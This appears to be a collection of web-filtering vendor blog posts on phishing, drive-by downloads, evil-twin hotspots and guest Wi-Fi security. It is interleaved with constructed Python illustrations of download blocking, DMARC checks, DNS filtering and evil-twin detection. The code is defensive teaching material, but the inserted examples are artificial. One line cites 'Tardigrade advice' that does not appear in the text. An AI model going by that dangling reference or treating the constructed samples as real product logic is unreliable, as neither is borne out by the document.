You are asked to download an invoice or receipt, such as a PDF file, .zip or .rar, or an executable file or .scr screensaver file
A malicious website may also tell you:
Your computer is already infected with malware
Your plug-ins or browser are out of date
You have won a competition or free prize draw. You may also be offered free money or vouchers that require you to enter your credit card or banking information
If you are asked to download any files or update your software, conduct a check of the site via Google and try to determine whether the site is genuine. If in doubt, do not download any files.
If you are told your browser is out of date, visit the official browser website and check your version number. Only ever download updates from official websites.
If you have accidentally visited a drive-by download site, by the time that you have connected it may be too late to prevent malware from being downloaded. To protect against drive-by downloads you must ensure that your browser, add-ons, and plugins are 100% up to date. You should also use a software solution to block access to drive-by download sites.
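The file types listed above (and the executable extensions the Tardigrade advice earlier on this page says a web filter should block, such as .js, .com, .exe and .bat) are easy to disguise: "invoice.pdf.exe" ends in .exe, and an executable served as "report.pdf" still starts with the Windows PE "MZ" header. The following added example, which is not WebTitan's or any product's logic, shows a download policy check that looks at both the file name and the first bytes of the content. The extension lists, magic-byte table and sample files are constructed for the example.

```python
"""Classify a download as executable/archive/other before a user gets it.

Added illustration, not product code. Policy: block anything whose last
extension is executable or whose content sniffs as an executable,
quarantine archives (they may hide executables), allow the rest.
"""

# Extensions treated as executable content (constructed list for the example).
BLOCKED_EXTENSIONS = {
    ".exe", ".com", ".bat", ".cmd", ".js", ".jse", ".vbs", ".scr",
    ".msi", ".ps1", ".hta", ".dll",
}
ARCHIVE_EXTENSIONS = {".zip", ".rar", ".7z"}

# "Magic bytes" at offset 0 for common formats; a renamed file keeps these.
MAGIC = {
    b"MZ": "pe-executable",        # Windows PE: .exe, .dll, .scr
    b"\x7fELF": "elf-executable",  # Linux/Unix ELF binary
    b"PK\x03\x04": "zip-archive",  # zip (also docx, jar, apk)
    b"Rar!\x1a\x07": "rar-archive",
    b"%PDF": "pdf",
}


def extensions_of(filename: str) -> list:
    """Every extension in order, so 'invoice.pdf.exe' -> ['.pdf', '.exe']."""
    name = filename.lower().rsplit("/", 1)[-1]
    parts = name.split(".")
    return ["." + p for p in parts[1:]] if len(parts) > 1 else []


def sniff_type(content: bytes) -> str:
    """Identify the content by its leading bytes, ignoring the file name."""
    for magic, kind in MAGIC.items():
        if content.startswith(magic):
            return kind
    return "unknown"


def download_policy(filename: str, content: bytes) -> dict:
    """Return {'action': 'block'|'quarantine'|'allow', 'type': ..., 'reasons': [...]}."""
    exts = extensions_of(filename)
    last = exts[-1] if exts else ""
    sniffed = sniff_type(content)
    reasons = []

    if last in BLOCKED_EXTENSIONS:
        reasons.append(f"blocked extension {last}")
        if len(exts) > 1:
            # 'invoice.pdf.exe': the inner extension is there to mislead the user.
            reasons.append("double extension disguises the real type")

    if sniffed in ("pe-executable", "elf-executable"):
        reasons.append(f"content sniffed as {sniffed}")
        if last not in BLOCKED_EXTENSIONS:
            reasons.append(f"extension {last or '(none)'} does not match content")

    if reasons:
        return {"action": "block", "type": sniffed, "reasons": reasons}
    if sniffed.endswith("-archive") or last in ARCHIVE_EXTENSIONS:
        return {"action": "quarantine", "type": sniffed,
                "reasons": ["archive may contain executables; scan before release"]}
    return {"action": "allow", "type": sniffed, "reasons": []}


if __name__ == "__main__":
    # Constructed sample downloads: name plus the first bytes of the body.
    samples = [
        ("setup.exe", b"MZ\x90\x00\x03\x00\x00\x00"),
        ("invoice.pdf.exe", b"MZ\x90\x00\x03\x00\x00\x00"),
        ("report.pdf", b"MZ\x90\x00\x03\x00\x00\x00"),   # renamed executable
        ("report.pdf", b"%PDF-1.7\n%\xe2\xe3\xcf\xd3"),
        ("photos.zip", b"PK\x03\x04\x14\x00\x00\x00"),
        ("notes.txt", b"meeting notes\n"),
    ]
    for name, body in samples:
        verdict = download_policy(name, body)
        print(f"{name:18} {verdict['action']:10} {verdict['type']:15} {verdict['reasons']}")
```

The extension check alone would pass the renamed "report.pdf"; the magic-byte check alone would pass a JavaScript file, which has no fixed header. Using both closes each gap the other leaves, and archives get a separate path because a .zip is neither safe nor malicious until its contents are inspected.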
Protection from web-based threats and precision Internet content control for your workforce. Book a FREE WebTitan demo.
How to block end users from visiting a malicious website
Even legitimate websites can be hacked and used to host malicious code. They may use advertising networks that are used by cybercriminals to direct visitors to malware-hosting websites. The best defense is to block these adverts and malicious websites.
Blocking access to malicious websites is a simple process. All it requires is a powerful web filtering solution to be installed. WebTitan web filtering solutions for the enterprise will help you keep your network secure by preventing users from visiting sites known to host malware.
WebTitan incorporates a range of measures to detect malicious web content to prevent employees from visiting dangerous websites. WebTitan can also be configured to block access to questionable or illegal content to enforce an organization’s acceptable Internet usage policy.
If employees are trained on malicious website identification and web filtering software is installed, your network will be much better protected from malware infections and other web-based threats.
FAQs on Guest Wi-Fi Network Security and Blocking Malicious Websites
Should I enable guest Wi-Fi?
By enabling guest Wi-Fi, you are creating a separate network for guest users to access the Internet. This is much more secure than allowing a guest user to connect to your main business network. Be aware that your guest Wi-Fi network is still connected to your business so you should control the activities that can be performed while connected.
Are guest Wi-Fi networks secure?
A guest Wi-Fi network keeps guest users away from your servers and company data. While connected to the guest network, individuals will be prevented from accessing your internal resources even if they are able to locate them. If you do not have a separate guest network, you will be at risk of hacking and data theft.
How can I make my guest Wi-Fi network secure?
You can make your guest Wi-Fi network more secure by changing the name of the network (SSID) to something less obviously tied to your business, setting a strong password, and configuring the network to prevent access to local network resources. You should also implement a web filter to prevent users from accessing malicious web content.
Is web filtering complicated?
Setting up content filtering on a wired or wireless network is easy with a cloud-based web filter. Simply change your DNS settings to point to the service provider and you can be blocking threats and restricting access to web content in minutes. You will get a web-based interface to log in and can simply click on the categories of content you want to block.
How much does a web filtering solution cost?
There are many different providers of Wi-Fi filtering solutions and the cost can vary considerably. You could end up paying upwards of $2.50 per user per month; however, solutions such as WebTitan Cloud for Wi-Fi will give you the protection you need at a very reasonable cost, which can be as little as $1 per user, per month. To find out the cost, use our cost calculator.
Phishers are constantly changing their tactics, techniques, and procedures to evade security solutions and fool end users into disclosing sensitive information or installing malware. One of the most commonly used tactics is to impersonate trusted companies, with emails often including corporate logos, footers, and even correct contact information to make the messages look like genuine communications from the spoofed companies.
Email security solutions are now much better at detecting these scam emails. They use the email authentication protocols SPF, DKIM, and DMARC to detect and block email impersonation attacks. SPF (Sender Policy Framework) restricts which servers may send email on behalf of a domain and so prevents spoofing of the sending domain. DKIM (DomainKeys Identified Mail) cryptographically signs messages so that tampering in transit can be detected, while DMARC (Domain-based Message Authentication, Reporting and Conformance) builds on SPF and DKIM to protect against spoofing of the visible sender: it requires the domain authenticated by SPF or DKIM to align with the domain in the From: email header. This allows messages to be identified as unauthorized when they are sent using a domain by someone not permitted to use it.
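How the three protocols combine is easiest to see in the DMARC evaluation a receiving mail server performs. The following is an added example, not SpamTitan or TitanHQ code: given a domain's DMARC record, the From: header domain and the SPF and DKIM results the server already computed, it decides whether an authenticated identifier aligns with the From: domain and what the published policy says to do otherwise. The DMARC record, domains and authentication results are constructed; a real server fetches the record from DNS and computes the results itself, and real organizational-domain logic uses the Public Suffix List rather than the last-two-labels shortcut assumed here.

```python
"""DMARC disposition for one message, given SPF/DKIM results.

Added illustration of SPF + DKIM + DMARC alignment; not product code.
"""
from dataclasses import dataclass


def parse_dmarc_record(txt: str) -> dict:
    """Parse 'v=DMARC1; p=reject; adkim=s' style tag=value pairs."""
    tags = {}
    for part in txt.split(";"):
        part = part.strip()
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1":
        raise ValueError("not a DMARC record")
    # Defaults from RFC 7489: relaxed alignment unless the record says strict.
    tags.setdefault("adkim", "r")
    tags.setdefault("aspf", "r")
    return tags


def organizational_domain(domain: str) -> str:
    """Assumption for the example: the organizational domain is the last two
    labels. Real implementations consult the Public Suffix List."""
    labels = domain.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def aligned(auth_domain: str, from_domain: str, mode: str) -> bool:
    """Strict ('s') alignment needs an exact match; relaxed ('r') accepts
    any subdomain of the same organizational domain."""
    a, f = auth_domain.lower().rstrip("."), from_domain.lower().rstrip(".")
    if mode == "s":
        return a == f
    return organizational_domain(a) == organizational_domain(f)


@dataclass
class AuthResults:
    spf_result: str    # "pass", "fail", "none", ...
    spf_domain: str    # envelope-from (MAIL FROM) domain SPF was checked against
    dkim_result: str   # "pass", "fail", "none", ...
    dkim_domain: str   # d= tag of the signature that verified (or "" if none)


def dmarc_disposition(from_domain: str, record_txt: str, auth: AuthResults) -> dict:
    """DMARC passes when SPF or DKIM passes AND that identifier aligns with the
    From: header domain; otherwise the record's p= policy applies."""
    rec = parse_dmarc_record(record_txt)
    spf_ok = auth.spf_result == "pass" and aligned(auth.spf_domain, from_domain, rec["aspf"])
    dkim_ok = auth.dkim_result == "pass" and aligned(auth.dkim_domain, from_domain, rec["adkim"])
    passed = spf_ok or dkim_ok
    return {
        "spf_aligned": spf_ok,
        "dkim_aligned": dkim_ok,
        "dmarc": "pass" if passed else "fail",
        "disposition": "none" if passed else rec.get("p", "none"),
    }


if __name__ == "__main__":
    # Constructed: the brand's record, strict DKIM, relaxed SPF, reject policy.
    record = "v=DMARC1; p=reject; adkim=s; aspf=r; rua=mailto:dmarc@example.com"

    # Spoof attempt: SPF passes for the attacker's own bounce domain, no DKIM.
    spoof = AuthResults("pass", "bulk.attacker.example", "none", "")
    print("spoof   ", dmarc_disposition("example.com", record, spoof))

    # Legitimate mail sent from a subdomain mailer with a relaxed-aligned SPF.
    legit = AuthResults("pass", "mail.example.com", "none", "")
    print("legit   ", dmarc_disposition("example.com", record, legit))

    # Forwarded mail: SPF breaks in transit, the DKIM signature survives.
    forwarded = AuthResults("fail", "forwarder.example", "pass", "example.com")
    print("forwarded", dmarc_disposition("example.com", record, forwarded))
```

The spoof case is the one the page describes: an SPF "pass" on its own proves nothing about the visible sender, because the attacker controls the envelope domain. Only alignment with the From: domain turns SPF or DKIM into a statement about the brand the recipient sees.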
Machine-learning technology and AI are used to distinguish genuine communications from spoofed messages. Some email security solutions can perform checks of corporate logos in email messages and compare these to the sender’s address to make sure the emails have come from an official source.
One phishing campaign has been detected that attempts to circumvent these AI protections by using corporate logos that have had mathematical symbols inserted to replace existing letters. Checks of these images will not alert AI-based email security solutions to a fake message, since the spoofed email messages do not contain the official corporate logo. The logos are, however, sufficiently similar to the genuine logo to fool end users.
One example of this was found in an email spoofing Verizon. The official Verizon logo has a red V, which has been substituted for a red square root symbol. These emails attempt to trick the recipients into clicking a link in the email which directs them to a website that also spoofs the brand. They are then asked to provide credentials to verify their identity. Those credentials are then captured by the scammers.
The Verizon phishing email uses a fake voicemail message as a lure, then asks the user to enter their Office 365 credentials to access the voicemail message. While that is an obvious red flag, as Verizon does not require Office 365 credentials, individuals who fail to recognize the email as a scam may be fooled; after all, the phishing page accurately spoofs the official Verizon website.
While many spoofed emails will be blocked by SPF, DKIM, and DMARC, machine learning technology, and other checks employed by email security solutions, email security gateways are not 100% effective. For example, independent tests have shown SpamTitan has a very high detection rate – in excess of 99.97% – but a small number of emails will bypass defenses on occasion and that is true of all email security solutions.
This is why it is also recommended to implement a web filtering solution. Web filters tackle phishing from a different angle. Instead of blocking the message, they block attempts by end users to visit malicious links in emails.
TitanHQ’s web filtering solution – WebTitan – is a DNS-based web filter. When a request is made to visit a website, WebTitan performs a check at the DNS lookup stage of the request, before any content is downloaded. If the request is for a known malicious website or URL that violates an organization’s policies, the request is denied, and the user is protected. WebTitan is constantly updated to include malicious web content through multiple threat intelligence feeds to provide zero-minute protection.
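The DNS-stage check described above, and the "point your DNS at the service and click categories" setup from the guest Wi-Fi FAQ earlier on this page, come down to one decision a filtering resolver makes for every query. The following added example, which is not WebTitan code, shows that decision: a blocked domain covers all of its subdomains (matched label by label, so phish.example does not match phish.example.org), category policy is applied per domain, and a blocked name is answered with the block page's address instead of the real one. Because the resolver sees only the queried name, it cannot distinguish URL paths on the same host; that is why the page pairs it with email-side link checks. The threat-feed domains, category map, upstream addresses and block-page IP are all constructed.

```python
"""DNS-layer filtering decision, as a filtering resolver makes it.

Added illustration, not product code. All domains, addresses and
categories below are constructed for the example.
"""
from collections import Counter

BLOCK_PAGE_IP = "192.0.2.10"   # TEST-NET-1 address standing in for the block page

# Constructed feeds: a real filter loads these from threat intelligence.
MALICIOUS_DOMAINS = {"phish.example", "malware-cdn.example"}
CATEGORY_OF_DOMAIN = {
    "gambling.example": "gambling",
    "video.example": "streaming",
    "news.example": "news",
}
# Constructed stand-in for the upstream resolver's answers.
UPSTREAM = {
    "news.example": "198.51.100.7",
    "www.news.example": "198.51.100.7",
    "video.example": "198.51.100.9",
}
# Categories the administrator chose to block (e.g. on a guest network).
BLOCKED_CATEGORIES = {"gambling"}


def parent_chain(qname: str) -> list:
    """'login.phish.example' -> ['login.phish.example', 'phish.example', 'example']."""
    labels = qname.lower().rstrip(".").split(".")
    return [".".join(labels[i:]) for i in range(len(labels))]


def first_match(qname: str, table) -> str:
    """Most specific name in `table` that equals the query or a parent of it."""
    for candidate in parent_chain(qname):
        if candidate in table:
            return candidate
    return ""


def resolve_policy(qname: str, blocked_categories=BLOCKED_CATEGORIES) -> dict:
    """Decide allow/block for one query and the answer to return."""
    hit = first_match(qname, MALICIOUS_DOMAINS)
    if hit:
        return {"action": "block", "reason": f"threat feed: {hit}", "answer": BLOCK_PAGE_IP}

    cat_domain = first_match(qname, CATEGORY_OF_DOMAIN)
    category = CATEGORY_OF_DOMAIN.get(cat_domain, "uncategorized")
    if category in blocked_categories:
        return {"action": "block", "reason": f"category policy: {category}", "answer": BLOCK_PAGE_IP}

    # Allowed: hand back the upstream answer (None stands in for NXDOMAIN here).
    return {"action": "allow", "reason": f"category: {category}",
            "answer": UPSTREAM.get(qname.lower().rstrip("."))}


def summarize(queries) -> Counter:
    """Count allow/block decisions over a batch of queried names."""
    return Counter(resolve_policy(q)["action"] for q in queries)


if __name__ == "__main__":
    # Constructed query log: names a client resolved over a few minutes.
    log = ["www.news.example", "login.phish.example", "phish.example.org",
           "gambling.example", "video.example", "cdn.malware-cdn.example"]
    for q in log:
        d = resolve_policy(q)
        print(f"{q:26} {d['action']:6} {d['answer']!s:14} {d['reason']}")
    print(summarize(log))
```

Note the two deliberate behaviours: "phish.example.org" is allowed because suffix matching is done on whole labels, not on the string, and "video.example" is allowed under the default policy but blocked if "streaming" is added to the blocked categories, which is all the category click in a filter's interface really changes.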
Phishing attacks are becoming much more sophisticated, and while email security solutions will block the majority of attacks, phishing defenses now need to consist of multiple overlapping layers of security. By implementing a spam filter, web filter, antivirus software, and providing regular security awareness training, businesses can mount a formidable defense against phishing attacks.
For more information about web filters, contact TitanHQ today. All TitanHQ solutions are available on a free trial to allow potential customers to try before they buy with no obligation to proceed. Product demonstrations can also be provided on request.
Many employees access their work emails and work networks via public Wi-Fi hotspots, even though there is a risk that sensitive information such as login credentials could be intercepted by hackers. Many employees are unaware of the Wi-Fi security threats that lurk in their favorite coffee shop and fail to take precautions. Even employees who are aware of Wi-Fi security threats often ignore the risks.
This was highlighted by a 2017 survey by Symantec. 55% of survey participants said they would not hesitate to connect to a free Wi-Fi hotspot if the signal was good and 46% said they would rather connect to a free, open wireless network than wait to get a password for a secure access point.
60% of survey participants believed public Wi-Fi networks are safe and secure but even though 40% are aware of the Wi-Fi security threats, 87% said that they would access financial information such as their online banking portal or view their emails on public Wi-Fi networks.
The majority of users of public Wi-Fi networks who were aware of the Wi-Fi security threats said they ignored the risks. Millennials were the most likely age group to ignore Wi-Fi security threats: 95% of this age group said they had shared sensitive information over open Wi-Fi connections.
Consumers may be willing to take risks on public Wi-Fi networks, but what about employees? According to a 2018 Spiceworks survey, conducted on 500 IT professionals in the United States, employees are also taking risks.
61% of respondents to the survey said their employees connect to public Wi-Fi hotspots in coffee shops, hotels, and airports to work remotely. Only 64% of respondents said their employees were aware of the security threats on Wi-Fi. A similar percentage said their employees were aware of the risks and connect to their work networks using a VPN, which means that 4 out of 10 workers were unaware of the importance of establishing a secure connection.
Even though 64% of respondents were confident that employees were aware of the risks, only half were confident that data stored on mobile devices was adequately protected against threats from public Wi-Fi hotspots. 12% of respondents said they have had to deal with a public Wi-Fi-related security incident, although a further 34% were not sure if there had been a security breach as many incidents are never reported.
WiFi Security Threats Everyone Should be Aware of
All employers should now be providing security awareness training to their employees to make the workforce more security-aware. Employees should be trained how to identify phishing attempts, warned of the risk from malware and ransomware, and taught about the risks associated with public Wi-Fi networks.
Five threats associated with open public Wi-Fi hotspots are detailed below:
Evil Twins – Rogue Wi-Fi Hotspots
One of the most common ways of obtaining sensitive information is for a cybercriminal to set up an evil twin hotspot. This is a fake Wi-Fi access point that masquerades as the legitimate access point, such as one offered by a coffee shop or hotel. An SSID could be set up such as “Starbuck Guest Wi-Fi” or even just state the name of the establishment. Any information disclosed while connected to that hotspot can be intercepted.
Packet Sniffing
Using a packet sniffer, a hacker can identify, intercept, and monitor web traffic over unsecured Wi-Fi networks and capture personal information such as login credentials to bank accounts and corporate email accounts. If credentials are obtained, a hacker can gain full control of an account.
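An evil twin usually gives itself away in the scan results: the venue's name appears a second time as an open network, from an access point whose hardware vendor differs from the real ones, often with a lookalike spelling. The following added example (not TitanHQ or WebTitan code) applies those three checks to a constructed set of scan records of the kind a Wi-Fi scanning tool reports (SSID, BSSID, security, signal). The assumption that the first three octets of the BSSID identify the vendor, and that a venue's real access points share a vendor, is a heuristic, not a guarantee; the records are constructed.

```python
"""Flag likely evil-twin access points in a Wi-Fi scan.

Added illustration for security-awareness material; not product code.
Scan records below are constructed, not captured.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Ap:
    ssid: str
    bssid: str
    security: str   # "open", "WPA2", "WPA3", ...
    signal: int     # dBm, higher (less negative) is stronger


# Constructed scan: two real hotel APs (same vendor prefix), a strong open
# twin from a different vendor prefix, a lookalike spelling, and one unrelated net.
SCAN = [
    Ap("Hotel Guest", "A4:11:22:00:00:01", "WPA2", -55),
    Ap("Hotel Guest", "A4:11:22:00:00:02", "WPA2", -60),
    Ap("Hotel Guest", "02:AA:BB:77:77:77", "open", -40),
    Ap("Hotel-Guest", "02:AA:BB:77:77:78", "open", -42),
    Ap("CoffeeShop",  "B8:27:EB:00:00:05", "WPA2", -70),
]


def normalize(ssid: str) -> str:
    """Collapse case, spaces and punctuation so 'Hotel-Guest' == 'Hotel Guest'."""
    return "".join(ch for ch in ssid.lower() if ch.isalnum())


def oui(bssid: str) -> str:
    """Assumption: first three octets identify the access point's vendor."""
    return bssid.upper()[:8]


def evil_twin_findings(scan) -> list:
    """Return [(normalized_name, finding)] for names that look suspicious."""
    by_name = defaultdict(list)
    for ap in scan:
        by_name[normalize(ap.ssid)].append(ap)

    findings = []
    for name, aps in by_name.items():
        spellings = {ap.ssid for ap in aps}
        securities = {ap.security.lower() for ap in aps}
        vendors = {oui(ap.bssid) for ap in aps}
        if len(spellings) > 1:
            findings.append((name, "lookalike SSIDs: " + ", ".join(sorted(spellings))))
        if "open" in securities and len(securities) > 1:
            findings.append((name, "same name advertised both open and encrypted"))
        if len(vendors) > 1:
            findings.append((name, "same name from APs with different vendor prefixes"))
    return findings


def suspicious_names(scan) -> set:
    """Normalized SSIDs a user should not join without confirming with staff."""
    return {name for name, _ in evil_twin_findings(scan)}


if __name__ == "__main__":
    for name, finding in evil_twin_findings(SCAN):
        print(f"{name:12} {finding}")
    print("avoid:", sorted(suspicious_names(SCAN)))
```

The open twin is also the strongest signal in the constructed scan, which is typical: devices set to auto-join prefer it. None of these checks replaces a VPN, which protects the traffic even if the wrong hotspot is joined; they only make the wrong hotspot easier to notice.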
File Sharing
Many people have file-sharing enabled on their devices. This feature is useful at home and in the workplace, but it can easily be abused by hackers. It gives them an easy way to connect to a device that is connected to a Wi-Fi hotspot. A hacker can abuse this feature to drop malware on a device when it connects to a hotspot.
Shoulder Surfing
Not all threats are high-tech. One of the simplest methods of obtaining sensitive information is to observe someone’s online activities by looking over their shoulder. Information such as passwords may be masked so that it is not visible on screen, but cybercriminals can watch the keyboard and work out passwords as they are typed.
Malware and Ransomware
When connecting to a home or work network, some form of anti-malware control is likely to have been installed, but those protections are often lacking on public Wi-Fi hotspots. Without the protection of AV software and a web filter, malware can be silently downloaded.
Employers can reduce risk by providing comprehensive training to employees to make sure they are aware of the risks from public Wi-Fi hotspots and understand that they should only connect to public Wi-Fi networks through a VPN. Employers can further protect workers with WebTitan Cloud – an enterprise-class web filter that protects workers from online threats, regardless of where they connect.
Hotspot providers can protect their customers by securing their Wi-Fi hotspots with WebTitan Cloud for Wi-Fi. WebTitan Cloud for Wi-Fi is a powerful web filter that protects all users of a hotspot from malware and phishing attacks, and can also be used to control the types of sites that can be accessed. If you offer Wi-Fi access, yet are not securing your hotspot, your customers could be at risk.
Contact TitanHQ today to find out how you can protect your customers from online threats, control the content that can be accessed via your Wi-Fi network, and discover how quick and easy it is to create a family-friendly Wi-Fi environment.
Hospitals often invest heavily in solutions to secure the network perimeter, although the importance of Internet and WiFi filtering in hospitals is often misunderstood. Network and software firewalls are essential, but alone they will not provide protection against all attacks. As healthcare IT security staff know all too well, the actions of employees can see cybersecurity defenses bypassed.
A look at the Department of Health and Human Services’ Office for Civil Rights breach portal shows just how many cyberattacks on hospitals are now occurring. Cybercriminals are targeting healthcare organizations due to the value of protected health information (PHI) on the black market. PHI is worth ten times as much as credit card information, so it is no surprise that hospitals are in cybercriminals’ crosshairs. Even a small hospital can hold the PHI of more than 100,000 individuals. If access is gained to a hospital network, the potential rewards for a hacker are considerable.
There has also been a massive increase in ransomware attacks. Since hospitals need access to patients’ PHI, they are more likely than organizations in other industry sectors to pay a ransom to regain access to their data. Hollywood Presbyterian Medical Center paid $17,000 for the keys to unlock its files following a ransomware attack in February 2016. It was one of several hospitals to give in to attackers’ demands following ransomware attacks.
A Web Filter is an Important Extra Security Layer to Protect Against Phishing Attacks
Phishing is one of the main threats for healthcare organizations, so it is vital for the email system to be secured with an advanced spam filtering solution and for security awareness training to be provided to employees. However, layered defenses are required to reduce the threat of phishing to a reasonable and acceptable level.
A web filtering solution is an important additional control in the fight against phishing. If an employee clicks on a hyperlink in a phishing email that has made it past email security defenses, the phishing website can be blocked. Instead, the user will be directed to a block screen and a potential account compromise can be avoided. A web filter will also help to protect users from malicious redirects when browsing the internet.
Protect your customers from web-based threats such as drive-by downloads, exploit kits, and phishing. Book a FREE WebTitan demo. Book Free Demo
The Hospital WiFi Environment is a Potential Gold Mine for Cybercriminals
Another common weak point is the WiFi network. IT security teams may have endpoint protection systems installed, but often not on mobile devices that connect to WiFi networks. The increasing number of wireless devices that are now in use in hospitals increases the incentive for cybercriminals to attempt to gain access to WiFi networks. Not only do physicians use mobile phones to connect to the networks and communicate PHI, but there are also laptops, tablets, and an increasing number of medical devices connected to WiFi networks. As the use of mobile and IoT devices in healthcare continues to grow, the risk of attacks on the WiFi environment will increase.
Patients also connect to hospital WiFi networks, as do visitors to hospitals. They too need to be protected from malware and ransomware when connected to hospital guest WiFi networks. One of the easiest ways to protect the devices that connect to WiFi networks is a web filtering solution. A web filter allows IT teams to carefully control the types of content that can be accessed on hospital WiFi networks, block malware downloads, and prevent all users from visiting malicious websites. Internet and WiFi filtering in hospitals should be included in cybersecurity defenses to reduce the risk of malware downloads from the internet and is an important additional control against insider breaches.
Internet and WiFi filtering in Hospitals is Not Just About Blocking Cyberthreats
Malware, ransomware, hacking, and phishing prevention aside, there are other important reasons for implementing Internet and WiFi filtering in hospitals.
Guest WiFi access in hospitals is provided to allow patients and visitors to access the Internet; however, there is only a certain amount of bandwidth available. If Internet access is to be provided, all patients and visitors should be able to gain access. Internet and WiFi filtering in hospitals can be used to restrict access to Internet services that consume large amounts of bandwidth, especially at times when network usage is heavy. Time-based controls can be applied at busy times to block access to video streaming sites, for example, to ensure all users can enjoy reasonable Internet speeds.
It is also important to prevent patients, visitors, and healthcare professionals from accessing inappropriate website content. Internet and WiFi filtering in hospitals should include a block on adult content and other inappropriate or illegal material. Blocks can easily be placed on illegal file-sharing websites, gambling or gaming sites, or any other undesirable category of web content.
Internet and WiFi filtering in hospitals ensures WiFi networks can be used safely and securely by all users, including minors. Blocking illegal, undesirable, and age-inappropriate content is not just about protecting patients and visitors. It also reduces legal liability.
Protection from web-based threats and precision Internet content control for your workforce. Book a FREE WebTitan demo. Book Free Demo
Internet and WiFi Filtering in Hospitals Made Simple
WebTitan Cloud for WiFi is an ideal solution for Internet and WiFi filtering in hospitals. WebTitan Cloud for WiFi is cost-effective to implement, the solution requires no additional hardware or software installations, and there is no latency. Being DNS-based, setup is quick and simple. A change to the DNS settings is all that is required to start filtering the Internet.
WebTitan Cloud for WiFi is ideal for hospital systems. The solution is highly scalable and can be used to protect any number of users in any number of locations. Multiple sites can be protected from one easy-to-use web-based user interface. Separate filtering controls can be applied for different locations, user groups, or even individuals. Since the solution links in with Active Directory, setting up controls for different users and departments is quick and simple. Separate content controls can easily be set for guests, visitors, and staff, including filtering controls by role.
WebTitan Cloud for WiFi supports blacklists and whitelists, allows precision content control via category or keyword, and blocks phishing websites and sites known to host exploit kits and malware. In short, WebTitan Cloud for WiFi gives you control over what users can do when connected to your WiFi network.
To find out more about WebTitan Cloud for WiFi, details of pricing, contact the TitanHQ team today.
Regardless of whether you run a hotel, coffee shop, or retail outlet, Internet access is expected by customers, but make sure you secure guest WiFi for business visitors. Providing business visitors and customers with access to the Internet brings many benefits, but if you do not secure guest WiFi for business visitors you will be exposing yourself, and them, to considerable risk. If you offer secure guest WiFi access, all users will be protected from malware, ransomware, and phishing when connected to the network. That can be a good selling point for businesses. It also shows you care about your customers.
Why Is Providing Internet Access so Important?
In 2013, one study revealed that 80% of customers in retail outlets felt the provision of free WiFi access would influence their purchasing decisions. If retailers provide guest WiFi access, they are likely to encourage more potential customers into their stores and get more sales opportunities.
With more people purchasing online, businesses need to adapt. Customers want to be able to check online before making a purchase or signing up for a service, such as reading online reviews. Fail to offer Internet access and customers are more likely to leave and make a purchase at another time. Chances are that sales will be made elsewhere. Keep them in your store and allow them to access the internet and your chances of achieving a sale will be increased. Of course, if you are unable to compete with online retailers – Amazon for example – you could provide free WiFi but block access to that website.
Why is Secure Guest WiFi for Business So Important?
There are considerable benefits to be gained from offering customers free Internet access. It is what customers want, it provides businesses with an opportunity to communicate with customers, it allows businesses to collect contact details for future marketing programs, and by monitoring the use of the Internet in-store, businesses can gain valuable customer insights and find out more about the interests of their customers. Businesses should note however that the General Data Protection Regulation (GDPR) requires consent to be obtained before any personal information is collected and used.
Giving customers and guests access to the Internet opens a business up to considerable risks. If those risks are not mitigated, guest WiFi access can prove incredibly costly. You may have trained your employees to be security-aware and have introduced policies covering allowable Internet usage, but guests, customers, and other visitors are likely to have different views about the content that can be accessed on your WiFi network.
Guests and customers could take advantage of a lack of restrictions to access inappropriate material such as pornography. Individuals could engage in morally or ethically questionable activities on a business network or even illegal activity such as copyright-infringing downloads. They may also accidentally install malware or ransomware or visit phishing websites.
Secure guest WiFi for business means protecting yourself, your customers, and your guest users. Securing guest WiFi for business visitors ensures they are protected when connected to your network. You will be able to block man-in-the-middle attacks and malware downloads and protect against phishing attacks. By providing secure guest Internet access, you will also be able to reduce legal liability.
5 Things to Consider About Secure Guest WiFi for Business Customers
If you are going to open up your network to guests, security cannot be an afterthought. Secure guest WiFi for business is a must. Before providing WiFi access, be sure to consider the points below:
Segment Your Network
Segmenting your network is important for two reasons. First, secure guest WiFi for business means visitors should not be able to gain access to parts of the network used by your employees. Your business guest wireless network should be kept totally separate from the internal network used by your employees. Guest users should not be able to log on and see your network assets, confidential files, and resources. Use a network firewall or create a separate VLAN for guest use, and use a software firewall to protect servers and workstations from traffic originating on the guest network. Second, in the event of a malware or ransomware infection, a segregated network greatly limits the harm that can be caused.
Always Change Default Passwords and SSIDs
This is one of the most basic security practices, yet because of that, it is easy to forget. The Internet is littered with reports of data breaches that have occurred as a result of the failure to change default passwords. All network peripherals should have strong, unique passwords set.
It is also important to change your SSID for your WiFi network. The SSID should reflect the name of your business and it should be quite clear to your customers which is your network. Fail to do this and you make it too easy for malicious individuals to set up "evil twin" access points and lure guests onto those rogue access points and conduct man-in-the-middle attacks. You can post the SSID and password internally to make it easy for legitimate users to gain access to your network. Be sure to change your password regularly.
Keep Your Firmware Updated!
Firmware updates are issued for a reason. They correct vulnerabilities that could easily be exploited by cybercriminals to gain access to your devices and network. If those vulnerabilities are exploited, configurations can be changed for a variety of nefarious purposes. You should have policies in place that require firmware updates to be installed promptly, with checks performed monthly to ensure that all devices have been updated and no firmware updates have been missed.
Encrypt Your Wireless Signals
You want to make it as easy as possible for your guest WiFi network to be accessed by your customers and visitors, but don’t make it too easy for hackers to spy on individuals connected to the network. Make sure you encrypt your wireless network with WPA2/WPA3 encryption.
If your router does not support WPA2 as a minimum, it is time to upgrade your router’s firmware or, if that is not possible, to buy a modern router that supports WPA3 encryption. If you fail to encrypt your WiFi, it is too easy for your bandwidth to be stolen and for data to be intercepted.
Secure Guest WiFi for Business Means Content Filtering
Secure guest WiFi for business means adding controls to limit the content that can be accessed on your WiFi network.
You should block access to adult content – which includes pornography, gambling sites, and dating sites, and also web content that is ethically or morally questionable or illegal.
A web filtering solution will also protect your customers from accidental malware and ransomware downloads and is an important anti-phishing control.
Consider using a cloud-based web filter as these require no additional hardware to be purchased. They can also be configured and maintained remotely and will not require software or firmware upgrades. In contrast to appliance-based web filters, cloud-based filters are more scalable and are more adaptable to the changing needs of your business.
Wireless Guest Network Best Practices
